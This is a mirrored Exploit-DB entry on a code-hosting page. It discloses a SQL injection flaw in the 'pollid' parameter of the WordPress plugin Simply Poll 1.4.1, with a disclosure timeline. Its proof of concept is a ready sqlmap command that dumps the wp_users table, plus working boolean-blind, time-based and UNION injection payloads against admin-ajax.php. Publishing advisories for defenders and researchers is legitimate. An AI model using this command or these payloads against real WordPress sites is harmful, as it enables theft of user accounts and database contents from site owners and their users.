bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40971.txt
Offensive Security f8746c89a4 DB: 2016-12-29 
4 new exploits

analogx SimpleServer:WWW 1.0.6 - Directory Traversal
AnalogX SimpleServer:WWW 1.0.6 - Directory Traversal

My PHP Dating - 'success_story.php id' SQL Injection
My PHP Dating - 'id' Parameter SQL Injection

Roundcube 0.3.1 - Cross-Site Request Forgery / SQL Injection
Roundcube Webmail 0.3.1 - Cross-Site Request Forgery / SQL Injection

Roundcube 1.1.3 - Directory Traversal
Roundcube Webmail 1.1.3 - Directory Traversal

PHPMailer 5.2.17 - Remote Code Execution
PHPMailer < 5.2.18 - Remote Code Execution (Bash)
PHPMailer < 5.2.18 - Remote Code Execution (PHP)
PHPMailer < 5.2.20 - Remote Code Execution
WordPress Plugin Simply Poll 1.4.1 - SQL Injection
SwiftMailer < 5.4.5-DEV - Remote Code Execution
2016-12-29 05:01:16 +00:00

64 lines
1.8 KiB
Text
Executable file
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Simply Poll 1.4.1 Plugin for WordPress ­ SQL Injection
# Date: 21/12/2016
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/simply-poll/
# Software Link: https://wordpress.org/plugins/simply-poll/
# Contact: info@tad.bg
# Website: http://tad.bg <http://tad.bg/>
# Category: Web Application Exploits
1 - Description
An unescaped parameter was found in Simply Poll version 1.4.1. ( WP
plugin ). An attacker can exploit this vulnerability to read from the
database.
The POST parameter 'pollid' is vulnerable.
2. Proof of Concept
sqlmap -u "http://example.com/wp-admin/admin-ajax.php"
--data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress
--threads=10 --random-agent --dbms=mysql --level=5 --risk=3
Parameter: pollid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=spAjaxResults&pollid=2 AND 6034=6034
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: action=spAjaxResults&pollid=2 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: action=spAjaxResults&pollid=-7159 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7171,0x55746570525a68726d4a634844657
9564f524752646c786a5451775272645a6e734b766657534c44,0x7162627171),NULL--
CfNO
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver
is misconfigured, read & write access the filesystem may be possible.
4 Impact:
Critical
5. Affected versions:
<= 1.4.1
6. Disclosure Timeline:
21-Dec-2016 ­ found the vulnerability
21-Dec-2016 ­ informed the developer
28-Dec-2016 ­ release date of this security advisory
Not fixed at the date of submitting that exploit.
Reference in a new issue View git blame Copy permalink